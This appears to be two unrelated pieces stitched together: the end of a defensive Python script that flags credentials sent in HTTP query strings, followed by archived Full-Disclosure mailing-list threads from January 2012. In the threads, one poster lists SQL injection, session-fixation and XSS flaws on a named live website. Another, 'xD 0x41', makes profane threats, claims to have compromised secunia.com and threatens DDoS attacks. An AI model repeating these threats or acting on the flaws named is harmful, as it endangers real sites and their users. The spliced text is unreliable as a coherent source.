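    return Counter(f["kind"] for raw in requests for f in find_leaks(raw))


# Constructed sample traffic modelled on the post; all values are placeholders.
SAMPLE_REQUESTS = [
    "GET /ge/index.php?ll=60.2345,9.1232&username=15550100&imei=000000000000000 HTTP/1.1\r\n"
    "Host: voip.example\r\nAccept: */*\r\n\r\n",
    "POST /packagedetails.php?n=15550100&p=constructed-pw HTTP/1.1\r\n"
    "Host: voip.example\r\nContent-Length: 0\r\n\r\n",
    "POST /oauthserver/synchservice HTTP/1.1\r\n"
    "Host: voip.example\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\n"
    "username=15550100&password=constructed-pw",
]

if __name__ == "__main__":
    for raw in SAMPLE_REQUESTS:
        for finding in find_leaks(raw):
            print(finding)
    print(dict(summarize(SAMPLE_REQUESTS)))
```

Secrets placed in the query string also end up in server and proxy logs, so the `query` findings remain a problem after a move to HTTPS.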
Re: [Full-disclosure] Faux Anonymous hackers to Facebook: 'We're not playing'
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On 25/01/2012 20:16, adam wrote: If we cared, we'd visit that site of our own volition. Secondly, even if we were interested: most of the people on these lists are intelligent enough not to click on links from spammers. Third, even if the content were interesting, even if this were the place for it and even if you hadn't spammed: pay and register is incentive enough for me *not* to join and * not* to ever visit that site again. Short version: this purpose of this list isn't for you to spam your new state-of-the-art website. Instead, it's typically to discuss/disclose issues/concepts related to computer/network security. Once in a while, there are discussions about the overflowing stupidity that some site owners/coders have. For example, people that stupidly (and blindly) inject code (e.g. for tracking purposes) into every single file on their site, regardless of extension: http://www.karmacyberintel.net/robots.txt Another one is blatantly disclosing paths in robots.txt that aren't even linked to and would never be found anyway (at least by bots that honor robots.txt, which ends up being the exact opposite of the desired effect). An example of how/why this can be a problem: md5sum of tiny_mce.js off your server is 9754385dabfc67c8b6d49ad4acba25c3, if we perform a simple Google search - we can determine that you're likely running version 3.3.1 of Wordpress. From there, we have enough information to perform a targeted attack on your server. Except, we don't need to because you've already made it more than easy enough for us. Pretty much every single field on http://www.karmacyberintel.net/pay/ is vulnerable to SQL injection, which could easily allow anyone to completely compromise the database and possibly the entire site. On top of that, register.php also allows for session fixation attacks, as a result of header/cookie manipulation. 
If that weren't bad enough, the admin section for your karma theme is also vulnerable to cross-site scripting. Not to mention, all the problems with how you've configured SSL and everything else. If you're going to spam, at least make sure the website you're spamming has been tested and determined to be *somewhat* secure.

Thanks for the smile. If one is not certain that one's own house is not made of glass, it's best to not throw stones. D

On Tue, Jan 24, 2012 at 11:31 PM, karma cyberintel karmacyberint...@gmail.com wrote: *UPDATE* After attacking several government sites to protest controversial US legislation in past weeks, hacktivist group Anonymous is setting its sights on one of the Internet's biggest targets: Facebook. Or maybe not. Sources Form karmacyberintel.net for more details http://www.karmacyberintel.net/2012/01/faux-anonymous-hackers-to-facebook-were-not-playing/
Re: [Full-disclosure] Megaupload Anonymous hacker retaliation, nobody wins
yea...well, they think I am you...so... lol, i hope they do :P coz, you will get fuxed, for anything i have said :) later! On 26 January 2012 09:10, andrew.wallace andrew.wall...@rocketmail.com wrote: My lawyers are looking through this thread to see if anything libelous has been said against me or the n3td3v organisation. --- Andrew Wallace Independent consultant www.n3td3v.org.uk From: xD 0x41 sec...@gmail.com To: Levente Peres sheri...@sansz.org Cc: full-disclosure@lists.grok.org.uk Sent: Wednesday, January 25, 2012 9:24 PM Subject: Re: [Full-disclosure] Megaupload Anonymous hacker retaliation, nobody wins stfu idiot. they can do wtf they want, think about that! now, go fuck yaself...and enjoy mailing on FD and secunia is like, got smtp problems now ;) tc. GLOW you all thought im some fuckwit called n3td3v ,for this, you all pay! I, single fucking handedly, will destroy secunia , and this bs list. BELIEVE THAT TO! On 26 January 2012 07:53, Levente Peres sheri...@sansz.org wrote: On a personal note, maybe OFF... I fail to see the gain in such retaliations, especially in organized ones... First the Megaupload retaliation, now the UN... and for what... I know people want to be heard, but this is plainly sending the wrong message. This will give decision makers EXACTLY what they WANT. They coax otherwise smart people into acting out violently, thereby creating just the false-flag anarchy to prove their point, which is: yes, we need to censor and control everything especially the Internet, because see, there's already a 'war out there at the gates and we need to protect etc. whatever'. We've seen it before countless times and this reverse strategy almost always works. If anyone from the responsible groups are reading this, please know that I'm not against the point that you are trying to make... You are all learned and knowledgable people, otherwise you wouldn't have been able to pull this complicated scheme off... 
but I implore you to reconsider such outbursts in the future for the sake of the very thing that you are trying to protect... What's done is done, but let's not give these goons one more reason to take away freedom even more so... Please. Just consider this. That's all I'm asking... And I guess that's all I wanted to say. Levente On 01/25/2012 08:20 AM, karma cyberintel wrote: (CBS) - The week began on a high note for Internet activist. The biggest organized effort to blackout websites in solidarity over the Stop Online Piracy Act (SOPA) and Protect IP Act (PIPA) was a huge success sources form for more details http://www.karmacyberintel.net/2012/01/megaupload-anonymous-hacker-retaliation-nobody-wins/
Re: [Full-disclosure] Faux Anonymous hackers to Facebook: 'We're not playing'
stfu idiot.. now go look at your boxes :) and netstatsand enjoy being part of, a much nicer, smaller organisation wich is only here, to destroy you all. :) bye! oh btw, secunia,.com is also, owned. have phun! GLOW On 26 January 2012 09:19, Dave m...@propergander.org.uk wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On 25/01/2012 20:16, adam wrote: If we cared, we'd visit that site of our own volition. Secondly, even if we were interested: most of the people on these lists are intelligent enough not to click on links from spammers. Third, even if the content were interesting, even if this were the place for it and even if you hadn't spammed: pay and register is incentive enough for me *not* to join and * not* to ever visit that site again. Short version: this purpose of this list isn't for you to spam your new state-of-the-art website. Instead, it's typically to discuss/disclose issues/concepts related to computer/network security. Once in a while, there are discussions about the overflowing stupidity that some site owners/coders have. For example, people that stupidly (and blindly) inject code (e.g. for tracking purposes) into every single file on their site, regardless of extension: http://www.karmacyberintel.net/robots.txt Another one is blatantly disclosing paths in robots.txt that aren't even linked to and would never be found anyway (at least by bots that honor robots.txt, which ends up being the exact opposite of the desired effect). An example of how/why this can be a problem: md5sum of tiny_mce.js off your server is 9754385dabfc67c8b6d49ad4acba25c3, if we perform a simple Google search - we can determine that you're likely running version 3.3.1 of Wordpress. From there, we have enough information to perform a targeted attack on your server. Except, we don't need to because you've already made it more than easy enough for us. 
Pretty much every single field on http://www.karmacyberintel.net/pay/ is vulnerable to SQL injection, which could easily allow anyone to completely compromise the database and possibly the entire site. On top of that, register.php also allows for session fixation attacks, as a result of header/cookie manipulation. If that weren't bad enough, the admin section for your karma theme is also vulnerable to cross-site scripting. Not to mention, all the problems with how you've configured SSL and everything else. If you're going to spam, at least make sure the website you're spamming has been tested and determined to be *somewhat* secure.

Thanks for the smile. If one is not certain that one's own house is not made of glass, it's best to not throw stones. D

On Tue, Jan 24, 2012 at 11:31 PM, karma cyberintel karmacyberint...@gmail.com wrote: *UPDATE* After attacking several government sites to protest controversial US legislation in past weeks, hacktivist group Anonymous is setting its sights on one of the Internet's biggest targets: Facebook. Or maybe not. Sources Form karmacyberintel.net for more details http://www.karmacyberintel.net/2012/01/faux-anonymous-hackers-to-facebook-were-not-playing/
Re: [Full-disclosure] Anonymous deletes CBS.com, solicits opinions on who to hack next
This guy is full of win, it's like watching the special Olympics in HD.

On Wed, Jan 25, 2012 at 12:51 PM, Henry M henr...@gmail.com wrote: Reporting three day old news to Full-Disclosure. Awesome.

On Wed, Jan 25, 2012 at 1:51 AM, karma cyberintel karmacyberint...@gmail.com wrote: Anonymous deletes CBS.com, solicits opinions on who to hack next sources form karmacyberintel.net for more details http://www.karmacyberintel.net/2012/01/anonymous-deletes-cbs-com-solicits-opinions-on-who-to-hack-next/
Re: [Full-disclosure] Megaupload Anonymous hacker retaliation, nobody wins
well.. thats exactly whats happening :) so, hope your lawyer, is a fucking GUN! lol.. thats just, i hope, your twelling truth and DO have this power...to ruin them... as id love to watch :) under, your name, or, mine..your in UK, im not... :) oh, they been defaming, for ages now..and, ignoring also...because i wouldnot give them, my 0days..well, they can smoke my cock now... coz, half of them, i have in one *channel* , and the other, are about to join it..and secunia...has probs, with smtp :) so, if i am doing all of this to them, and theyre blaming YOU, well, thats not my fault, i and even others, have tried to tell them, our names, mean little...and, my name is NOT Andrew, it is DREW... or rather, in scottish it is, (highlands) dRU ... So, yes, theyre defaming but, i want to see you, actually do something, coz sofar, this has been said before, about them breaking laws etc etc, wich, they are, simply by adding you or me, as a 'cc' is automtically forcing us, to read theyre crap, wether i like you, or not... now, they hve been told, but, im actually, starting to like you now ;) you sure, we arent the same guy ? coz, we are soo similar :P~~ And secunia,and FD, is finished this year :) Now as for secunia, it is yes sirs, to all those, who helped me, when, i was asking for YOUR helps, wich, i doubt you even would remember coz, ofcourse, you guys would NEVER do that to someone, then, have nonstop, attacked my persona... thinking, i am someone else...well, there is stacks, and stacks.. of emails, and many in private either way, i will destroy secunia and Fd, on my own. this year, is fds lastm, enjoy it. GLOWING DOOM FOR ALL On 26 January 2012 09:36, andrew.wallace andrew.wall...@rocketmail.com wrote: That is unfortunate for them because defamation is against the law. I take a tough approach these days to anyone using the list in this way. You are not anonymous, you are reachable anywhere in the world. 
Andrew From: xD 0x41 sec...@gmail.com To: andrew.wallace andrew.wall...@rocketmail.com Cc: full-disclosure@lists.grok.org.uk Sent: Wednesday, January 25, 2012 10:20 PM Subject: Re: [Full-disclosure] Megaupload Anonymous hacker retaliation, nobody wins yea...well, they think I am you...so... lol, i hope they do :P coz, you will get fuxed, for anything i have said :) later! On 26 January 2012 09:10, andrew.wallace andrew.wall...@rocketmail.com wrote: My lawyers are looking through this thread to see if anything libelous has been said against me or the n3td3v organisation. --- Andrew Wallace Independent consultant www.n3td3v.org.uk From: xD 0x41 sec...@gmail.com To: Levente Peres sheri...@sansz.org Cc: full-disclosure@lists.grok.org.uk Sent: Wednesday, January 25, 2012 9:24 PM Subject: Re: [Full-disclosure] Megaupload Anonymous hacker retaliation, nobody wins stfu idiot. they can do wtf they want, think about that! now, go fuck yaself...and enjoy mailing on FD and secunia is like, got smtp problems now ;) tc. GLOW you all thought im some fuckwit called n3td3v ,for this, you all pay! I, single fucking handedly, will destroy secunia , and this bs list. BELIEVE THAT TO! On 26 January 2012 07:53, Levente Peres sheri...@sansz.org wrote: On a personal note, maybe OFF... I fail to see the gain in such retaliations, especially in organized ones... First the Megaupload retaliation, now the UN... and for what... I know people want to be heard, but this is plainly sending the wrong message. This will give decision makers EXACTLY what they WANT. They coax otherwise smart people into acting out violently, thereby creating just the false-flag anarchy to prove their point, which is: yes, we need to censor and control everything especially the Internet, because see, there's already a 'war out there at the gates and we need to protect etc. whatever'. We've seen it before countless times and this reverse strategy almost always works. 
If anyone from the responsible groups are reading this, please know that I'm not against the point that you are trying to make... You are all learned and knowledgable people, otherwise you wouldn't have been able to pull this complicated scheme off... but I implore you to reconsider such outbursts in the future for the sake of the very thing that you are trying to protect... What's done is done, but let's not give these goons one more reason to take away freedom even more so... Please. Just consider this. That's all I'm asking... And I guess that's all I wanted to say. Levente On 01/25/2012 08:20 AM, karma cyberintel wrote: (CBS) - The week began on a high note for Internet activist. The biggest organized effort to blackout websites in solidarity over the Stop Online Piracy Act (SOPA) and Protect IP Act (PIPA) was a huge success sources form for more details
Re: [Full-disclosure] Megaupload Anonymous hacker retaliation, nobody wins
You are not anonymous, you are reachable anywhere in the world. hahah yes sir. suck my dick now, and stfu, actually no keep talking, itll give me more reasons, to own you and put you in my 'army' also :) so, ill ddos your own site, with your own box, k :) enjoy, security expert :P hahahahaha On 26 January 2012 09:36, andrew.wallace andrew.wall...@rocketmail.com wrote: That is unfortunate for them because defamation is against the law. I take a tough approach these days to anyone using the list in this way. You are not anonymous, you are reachable anywhere in the world. Andrew From: xD 0x41 sec...@gmail.com To: andrew.wallace andrew.wall...@rocketmail.com Cc: full-disclosure@lists.grok.org.uk Sent: Wednesday, January 25, 2012 10:20 PM Subject: Re: [Full-disclosure] Megaupload Anonymous hacker retaliation, nobody wins yea...well, they think I am you...so... lol, i hope they do :P coz, you will get fuxed, for anything i have said :) later! On 26 January 2012 09:10, andrew.wallace andrew.wall...@rocketmail.com wrote: My lawyers are looking through this thread to see if anything libelous has been said against me or the n3td3v organisation. --- Andrew Wallace Independent consultant www.n3td3v.org.uk From: xD 0x41 sec...@gmail.com To: Levente Peres sheri...@sansz.org Cc: full-disclosure@lists.grok.org.uk Sent: Wednesday, January 25, 2012 9:24 PM Subject: Re: [Full-disclosure] Megaupload Anonymous hacker retaliation, nobody wins stfu idiot. they can do wtf they want, think about that! now, go fuck yaself...and enjoy mailing on FD and secunia is like, got smtp problems now ;) tc. GLOW you all thought im some fuckwit called n3td3v ,for this, you all pay! I, single fucking handedly, will destroy secunia , and this bs list. BELIEVE THAT TO! On 26 January 2012 07:53, Levente Peres sheri...@sansz.org wrote: On a personal note, maybe OFF... I fail to see the gain in such retaliations, especially in organized ones... First the Megaupload retaliation, now the UN... and for what... 
I know people want to be heard, but this is plainly sending the wrong message. This will give decision makers EXACTLY what they WANT. They coax otherwise smart people into acting out violently, thereby creating just the false-flag anarchy to prove their point, which is: yes, we need to censor and control everything especially the Internet, because see, there's already a 'war out there at the gates and we need to protect etc. whatever'. We've seen it before countless times and this reverse strategy almost always works. If anyone from the responsible groups are reading this, please know that I'm not against the point that you are trying to make... You are all learned and knowledgable people, otherwise you wouldn't have been able to pull this complicated scheme off... but I implore you to reconsider such outbursts in the future for the sake of the very thing that you are trying to protect... What's done is done, but let's not give these goons one more reason to take away freedom even more so... Please. Just consider this. That's all I'm asking... And I guess that's all I wanted to say. Levente On 01/25/2012 08:20 AM, karma cyberintel wrote: (CBS) - The week began on a high note for Internet activist. The biggest organized effort to blackout websites in solidarity over the Stop Online Piracy Act (SOPA) and Protect IP Act (PIPA) was a huge success sources form for more details http://www.karmacyberintel.net/2012/01/megaupload-anonymous-hacker-retaliation-nobody-wins/ ___ Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Megaupload Anonymous hacker retaliation, nobody wins
I'm impressed that Andrew continues to maintain the dumbest person on FD position without actually being on FD. On Wed, Jan 25, 2012 at 5:26 PM, xD 0x41 sec...@gmail.com wrote: You are not anonymous, you are reachable anywhere in the world. hahah yes sir. suck my dick now, and stfu, actually no keep talking, itll give me more reasons, to own you and put you in my 'army' also :) so, ill ddos your own site, with your own box, k :) enjoy, security expert :P hahahahaha On 26 January 2012 09:36, andrew.wallace andrew.wall...@rocketmail.com wrote: That is unfortunate for them because defamation is against the law. I take a tough approach these days to anyone using the list in this way. You are not anonymous, you are reachable anywhere in the world. Andrew From: xD 0x41 sec...@gmail.com To: andrew.wallace andrew.wall...@rocketmail.com Cc: full-disclosure@lists.grok.org.uk Sent: Wednesday, January 25, 2012 10:20 PM Subject: Re: [Full-disclosure] Megaupload Anonymous hacker retaliation, nobody wins yea...well, they think I am you...so... lol, i hope they do :P coz, you will get fuxed, for anything i have said :) later! On 26 January 2012 09:10, andrew.wallace andrew.wall...@rocketmail.com wrote: My lawyers are looking through this thread to see if anything libelous has been said against me or the n3td3v organisation. --- Andrew Wallace Independent consultant www.n3td3v.org.uk From: xD 0x41 sec...@gmail.com To: Levente Peres sheri...@sansz.org Cc: full-disclosure@lists.grok.org.uk Sent: Wednesday, January 25, 2012 9:24 PM Subject: Re: [Full-disclosure] Megaupload Anonymous hacker retaliation, nobody wins stfu idiot. they can do wtf they want, think about that! now, go fuck yaself...and enjoy mailing on FD and secunia is like, got smtp problems now ;) tc. GLOW you all thought im some fuckwit called n3td3v ,for this, you all pay! I, single fucking handedly, will destroy secunia , and this bs list. BELIEVE THAT TO! 
On 26 January 2012 07:53, Levente Peres sheri...@sansz.org wrote: On a personal note, maybe OFF... I fail to see the gain in such retaliations, especially in organized ones... First the Megaupload retaliation, now the UN... and for what... I know people want to be heard, but this is plainly sending the wrong message. This will give decision makers EXACTLY what they WANT. They coax otherwise smart people into acting out violently, thereby creating just the false-flag anarchy to prove their point, which is: yes, we need to censor and control everything especially the Internet, because see, there's already a 'war out there at the gates and we need to protect etc. whatever'. We've seen it before countless times and this reverse strategy almost always works. If anyone from the responsible groups are reading this, please know that I'm not against the point that you are trying to make... You are all learned and knowledgable people, otherwise you wouldn't have been able to pull this complicated scheme off... but I implore you to reconsider such outbursts in the future for the sake of the very thing that you are trying to protect... What's done is done, but let's not give these goons one more reason to take away freedom even more so... Please. Just consider this. That's all I'm asking... And I guess that's all I wanted to say. Levente On 01/25/2012 08:20 AM, karma cyberintel wrote: (CBS) - The week began on a high note for Internet activist. The biggest organized effort to blackout websites in solidarity over the Stop Online Piracy Act (SOPA) and Protect IP Act (PIPA) was a huge success sources form for more details http://www.karmacyberintel.net/2012/01/megaupload-anonymous-hacker-retaliation-nobody-wins/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. 
Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Megaupload Anonymous hacker retaliation, nobody wins
I have found the perfect image to describe my thoughts on this current clash of intellectuals. http://www.threadbombing.com/data/media/27/arguing.jpg On Wed, Jan 25, 2012 at 4:26 PM, xD 0x41 sec...@gmail.com wrote: You are not anonymous, you are reachable anywhere in the world. hahah yes sir. suck my dick now, and stfu, actually no keep talking, itll give me more reasons, to own you and put you in my 'army' also :) so, ill ddos your own site, with your own box, k :) enjoy, security expert :P hahahahaha On 26 January 2012 09:36, andrew.wallace andrew.wall...@rocketmail.com wrote: That is unfortunate for them because defamation is against the law. I take a tough approach these days to anyone using the list in this way. You are not anonymous, you are reachable anywhere in the world. Andrew From: xD 0x41 sec...@gmail.com To: andrew.wallace andrew.wall...@rocketmail.com Cc: full-disclosure@lists.grok.org.uk Sent: Wednesday, January 25, 2012 10:20 PM Subject: Re: [Full-disclosure] Megaupload Anonymous hacker retaliation, nobody wins yea...well, they think I am you...so... lol, i hope they do :P coz, you will get fuxed, for anything i have said :) later! On 26 January 2012 09:10, andrew.wallace andrew.wall...@rocketmail.com wrote: My lawyers are looking through this thread to see if anything libelous has been said against me or the n3td3v organisation. --- Andrew Wallace Independent consultant www.n3td3v.org.uk From: xD 0x41 sec...@gmail.com To: Levente Peres sheri...@sansz.org Cc: full-disclosure@lists.grok.org.uk Sent: Wednesday, January 25, 2012 9:24 PM Subject: Re: [Full-disclosure] Megaupload Anonymous hacker retaliation, nobody wins stfu idiot. they can do wtf they want, think about that! now, go fuck yaself...and enjoy mailing on FD and secunia is like, got smtp problems now ;) tc. GLOW you all thought im some fuckwit called n3td3v ,for this, you all pay! I, single fucking handedly, will destroy secunia , and this bs list. BELIEVE THAT TO! 
On 26 January 2012 07:53, Levente Peres sheri...@sansz.org wrote: On a personal note, maybe OFF... I fail to see the gain in such retaliations, especially in organized ones... First the Megaupload retaliation, now the UN... and for what... I know people want to be heard, but this is plainly sending the wrong message. This will give decision makers EXACTLY what they WANT. They coax otherwise smart people into acting out violently, thereby creating just the false-flag anarchy to prove their point, which is: yes, we need to censor and control everything especially the Internet, because see, there's already a 'war out there at the gates and we need to protect etc. whatever'. We've seen it before countless times and this reverse strategy almost always works. If anyone from the responsible groups are reading this, please know that I'm not against the point that you are trying to make... You are all learned and knowledgable people, otherwise you wouldn't have been able to pull this complicated scheme off... but I implore you to reconsider such outbursts in the future for the sake of the very thing that you are trying to protect... What's done is done, but let's not give these goons one more reason to take away freedom even more so... Please. Just consider this. That's all I'm asking... And I guess that's all I wanted to say. Levente On 01/25/2012 08:20 AM, karma cyberintel wrote: (CBS) - The week began on a high note for Internet activist. The biggest organized effort to blackout websites in solidarity over the Stop Online Piracy Act (SOPA) and Protect IP Act (PIPA) was a huge success sources form for more details http://www.karmacyberintel.net/2012/01/megaupload-anonymous-hacker-retaliation-nobody-wins/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. 
Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Megaupload Anonymous hacker retaliation, nobody wins
On 2012-01-25, at 16:36, Sanguinarious Rose wrote: I have found the perfect image to describe my thoughts on this current clash of intellectuals. http://www.threadbombing.com/data/media/27/arguing.jpg Alternatively (also, a more memorable link): http://www.internetargument.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Megaupload Anonymous hacker retaliation, nobody wins
On Wed, Jan 25, 2012 at 6:53 PM, Levente Peres sheri...@sansz.org wrote: This will give decision makers EXACTLY what they WANT. Those who have already given up democracy think that way. People must choose (participate more often in decision making), not a few conglomerates' puppets. Marcio Barbado, Jr. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Megaupload Anonymous hacker retaliation, nobody wins
On Thu, 26 Jan 2012 09:20:17 +1100, xD 0x41 said: yea...well, they think I am you...so... lol, i hope they do :P On 26 January 2012 09:10, andrew.wallace andrew.wall...@rocketmail.com wrote: My lawyers are looking through this thread to see if anything libelous has been said against me or the n3td3v organisation. Given that I'm *still* waiting for him to carry through with his repeated threats to sue me for a BlackHat 2006 presentation that I didn't even write, I wouldn't worry too much about Andrew's lawyers. https://en.wikipedia.org/wiki/Estoppel_by_acquiescence https://en.wikipedia.org/wiki/Statute_of_limitations (see period of prescription) (Andrew - I'd avoid saying your lawyers are looking at the thread, unless you actually *do* have lawyers looking. You just set the clock ticking on an acquiescence defense or a period of prescription) And I've always wondered exactly who/what the n3td3v organization is - there doesn't seem to be a consultancy doing actual business under that name, or other legal entity that would have standing in a libel suit. Who/what gets listed as plaintiff? (You may as well tell us Andrew - if we don't know who the n3td3v organization is, we can't make an attempt to avoid accidentally libeling it. :) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Megaupload Anonymous hacker retaliation, nobody wins
On 2012-01-25, at 16:36, Sanguinarious Rose wrote: I have found the perfect image to describe my thoughts on this current clash of intellectuals. http://www.threadbombing.com/data/media/27/arguing.jpg -1 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Linux Local Root -- CVE-2012-0056 -- Detailed Write-up
Ubuntu just released patches: [USN-1342-1] (http://www.ubuntu.com/usn/usn-1342-1/). On Sun, Jan 22, 2012 at 6:25 PM, Jason A. Donenfeld ja...@zx2c4.com wrote: Server presently DoS'd, or dreamhost is tweaking again. Cache link: http://webcache.googleusercontent.com/search?hl=ensafe=offbiw=1009bih=687sclient=psy-abq=cache%3Ahttp%3A%2F%2Fblog.zx2c4.com%2F749pbx=1oq=cache%3Ahttp%3A%2F%2Fblog.zx2c4.com%2F749aq=faqi=g4aql=gs_sm=egs_upl=1077l2167l0l2282l7l4l0l0l0l0l148l403l2.2l4l0 On Sun, Jan 22, 2012 at 19:19, Jason A. Donenfeld ja...@zx2c4.com wrote: Hey Everyone, I did a detailed write-up on exploiting CVE-2012-0056 that some of y'all might appreciate. Pretty fun bug to play with -- dup2ing all over the place for the prize of getting to write arbitrary process memory into su :-). The write up is available on my blog here: http://blog.zx2c4.com/749 . Enjoy. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Megaupload Anonymous hacker retaliation, nobody wins
Andrew Farmer wrote: Alternatively (also, a more memorable link): http://www.internetargument.com/ I think the sentiment in that one is overstated. Usually -- really? Sometimes maybe... Aspiring to -- getting closer... Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/